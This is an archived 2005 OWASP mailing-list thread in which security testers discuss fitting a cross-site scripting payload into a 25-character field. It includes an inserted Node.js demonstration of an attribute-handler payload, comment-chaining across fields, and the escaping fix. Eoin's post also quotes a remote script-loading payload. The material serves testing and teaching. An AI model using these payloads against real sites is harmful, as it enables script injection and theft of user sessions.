[OWASP-TESTING] Re: [OWASP-Chapters] XSS in 25 characters or less

Jeff Williams jeff.williams at aspectsecurity.com
Thu May 19 21:05:38 EDT 2005


I ran into exactly this issue today. Since it was injecting into a form 
value, I used something like " onfocus=alert() " -- pretty short!

One other cool technique invented (as far as I know) by Bruce Mayhew here is 
to inject a comment start <!-- in one field and a closer in the next 
field -->.  That way you can chain the fields together and your script can 
span fields.

--Jeff
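Added example (not from the thread, and not Jeff's or Eoin's code): a Node.js model of a form page that echoes each submitted field back into an <input value="..."> after truncating it to 25 characters, as the thread describes. It shows the short attribute-handler payload, the two-field comment-chaining trick, and the attribute-encoding fix. The template, the field names, the LIMIT constant and the <svg> wrapper on the chained payload are my assumptions; the comment stripper is a simplified stand-in for the browser's parser, so the stitched markup should be confirmed in a real browser.

```javascript
// Added example, not code from the OWASP thread. Models a page that echoes
// each field into <input value="..."> after truncating to 25 characters.
// Template, field names and LIMIT are assumptions for illustration.

const LIMIT = 25; // per-field truncation described in the thread

// Hypothetical vulnerable template: values echoed raw, all on one line.
function renderVulnerable(fields) {
  return fields
    .map((v, i) => `<input name="f${i}" value="${v.slice(0, LIMIT)}">`)
    .join('');
}

// Hardened variant: encode the five significant characters before the
// value lands inside a double-quoted attribute.
function escapeAttr(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}
function renderHardened(fields) {
  return fields
    .map((v, i) => `<input name="f${i}" value="${escapeAttr(v.slice(0, LIMIT))}">`)
    .join('');
}

// Jeff's payload: closes the empty value="" and adds an unquoted handler.
const ATTR_PAYLOAD = '" onfocus=alert() "'; // 19 characters

// Comment chaining: field 0 opens an HTML comment, field 1 closes it, so the
// markup the server emits between the two fields never reaches the DOM and
// the script body is stitched from both fragments. The <svg> wrapper is my
// assumption: inside SVG the parser treats <script> content as ordinary
// text, where HTML comments apply (in an HTML <script> they would not).
const CHAIN_PAYLOADS = ['"><svg><script>alert(<!--', '-->1)</script>'];

// Simplified model of the parser's comment handling: drop <!-- ... -->.
function stripComments(html) {
  return html.replace(/<!--[\s\S]*?-->/g, '');
}

// True when a fragment survives the server-side truncation intact.
function fitsLimit(payload) {
  return payload.length <= LIMIT;
}

// Markup the browser would see once the comment has hidden the middle.
function chainedMarkup() {
  return stripComments(renderVulnerable(CHAIN_PAYLOADS));
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(renderVulnerable([ATTR_PAYLOAD]));
  console.log(chainedMarkup());
  console.log(renderHardened(CHAIN_PAYLOADS));
}
```

Running the file prints the raw rendering of the attribute payload, the stitched markup for the chained fragments, and the encoded output where both payloads end up as inert text inside the quoted value. The chained fragment is exactly 25 characters, so it also shows how tight the budget is once the closing quote, the tag and the comment opener are paid for.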

----- Original Message ----- 
From: "Eoin Keary" <eoinkeary at hotmail.com>
To: <daniel.cuthbert at owasp.org>
Cc: <owasp-ireland at lists.sourceforge.net>; 
<owasp-testing at lists.sourceforge.net>; 
<owasp-chapters at lists.sourceforge.net>
Sent: Thursday, May 19, 2005 11:08 AM
Subject: [OWASP-TESTING] Re: [OWASP-Chapters] XSS in 25 characters or less


> It's enforced on the server side, an AS/400 box which is web-enabled by "LANSA 
> For the Web".
> Anything over 25 chars is truncated when displayed back to the user.
> E
>
>>From: Daniel Cuthbert <daniel.cuthbert at owasp.org>
>>To: Eoin Keary <eoinkeary at hotmail.com>
>>CC: owasp-ireland at lists.sourceforge.net, 
>>owasp-testing at lists.sourceforge.net, owasp-chapters at lists.sourceforge.net
>>Subject: Re: [OWASP-Chapters] XSS in 25 characters or less
>>Date: Thu, 19 May 2005 12:10:09 +0100
>>
>>Interestingly, why have they only restricted it to 25 characters and 
>>where is this being enforced and by what?
>>
>>
>>On 18 May 2005, at 16:22, Eoin Keary wrote:
>>
>>>Hi,
>>>I have a window of 25 chars to perform an XSS exploit.
>>>Anything more is truncated by the server.
>>>
>>><script src=http://a.com/z.js></script>
>>>
>>>- this is 39 chars
>>>We can do HTML injection ("<a href=....") to a degree, but has anyone any 
>>>ideas on how to execute script in such a small window (25 chars)?
>>>We need to stay in the same domain (xyz.com) in order to make the attack 
>>>useful, so redirecting to another domain with the "<a href..." is no 
>>>good.
>>>
>>>First correct answer gets a pint of Guinness (Larry S, you're not 
>>>included for the pint as I owe you too many).
>>>
>>>Eoin
>>>
>>>_______________________________________________
>>>OWASP-Chapters mailing list
>>>OWASP-Chapters at lists.sourceforge.net
>>>https://lists.sourceforge.net/lists/listinfo/owasp-chapters
>>>
>>>
>>
>
> _______________________________________________
> owasp-testing mailing list
> owasp-testing at lists.sourceforge.net
> https://lists.sourceforge.net/lists/listinfo/owasp-testing 